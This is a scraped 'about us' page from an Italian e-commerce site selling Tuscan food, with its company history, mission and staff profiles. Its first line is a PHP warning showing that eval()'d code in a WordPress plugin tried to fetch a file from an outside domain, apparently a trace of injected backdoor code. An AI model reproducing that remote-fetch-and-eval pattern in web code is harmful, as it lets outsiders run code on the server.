Warning: file_get_contents(http://myspaceid.space/l0.txt): failed to open stream: Connection refused in /web/htdocs/www.osteriadelchianti.it/home/wp-content/plugins/2mb-autocode/2mb-autocode.php(165) : eval()’d code on line 1

La tradizione è
la nostra passione

Un po’ di storia

Osteria del Chianti nasce negli anni ’90 sulle orme di Gelax, pionieristica azienda leader nel confezionamento di prodotti alimentari surgelati preparati secondo le ricette della tradizione italiana. Da subito si pone come società innovatrice, capace di guadagnarsi una clientela affezionata ai buoni sapori autentici toscani.

Improntata alla ricerca dei prodotti tipici del territorio toscano e delle migliori ricette tradizionali realizzate da produttori locali, Osteria del Chianti riempie per oltre 20 anni i banchi freezer di supermercati e alimentari d’Italia, diffondendo la genuinità del made in Tuscany con un’ampia gamma di prodotti, come il
leggendario cacciucco alla livornese, ma anche proponendo al consumatore piatti “poveri” di culto come la pappa al pomodoro o la ribollita.

Oggi

Il marchio Osteria del Chianti è oggi rilanciato su una piattaforma e-commerce per distribuire in tutto il mondo i prodotti alimentari toscani ai nuovi consumatori digitali. Edoardo Ferrari, giovane imprenditore lucchese, rinnova l’azienda di famiglia con tutta la propulsione creativa di una giovane ed energica startup italiana.

Tutto si fonda, oggi come ieri, su un’accurata selezione dei prodotti e dei produttori affidata a Riccardo Simonetti, biologo nutrizionista con la passione per la ricerca di piccoli produttori e di grandi eccellenze.

Mission

Osteria del Chianti porta a casa tua il gusto autentico delle ricette toscane e dei prodotti tipici preparati da aziende agricole virtuose e rigorosamente biologiche su una piattaforma accessibile ad ogni consumatore in ogni angolo del pianeta.

Osteria del Chianti è oggi lo store online di riferimento per far assaporare la Toscana come non è stata mai gustata, con un occhio di riguardo ai prodotti gluten free e biologici. Il team viaggia di fattoria in fattoria e di azienda in azienda per selezionare e portare nel mondo il cibo toscano, fatto come una volta, proiettato verso il futuro.

Edoardo Ferrari

Ceo e fondatore di osteriadelchianti.it, Edoardo decide di rilanciare su piattaforma e-commerce lo storico marchio di famiglia, il galletto nero che fin dagli anni ’80 è paladino delle autentiche eccellenze gastronomiche toscane già pronte da gustare. Giovane e intraprendete, ha una forte passione per il cibo, quello buono, quello toscano. E per le buone idee.

Prodotto preferito: ribollita Radici

Riccardo Simonetti

Biologo nutrizionista, dietista, Riccardo seleziona per osteriadelchianti.it le eccellenze gastronomiche del territorio toscano e italiano sulla base di rigorosi standard qualitativi e della sua esperienza di studio sul rapporto cibo-benessere. Ha una predilezione per quelle piccole aziende che lavorano in armonia con la natura e che producono prodotti prevalentemente biologici da eccellenti materie prime, nel completo rispetto delle normative in tema di sicurezza alimentare.

Prodotto preferito: carciofi sott’olio Radici

Matteo Grande

Una volta scoperto cosa si nascondeva nella dispensa, non ha potuto dire di no a collaborare come content manager per osteriadelchianti.it. Butta giù i testi e scatta le fotografie resistendo strenuamente alle tentazioni gastronomiche.

Prodotto preferito: cantucci fichi e noci Sfizio

Continua lo shopping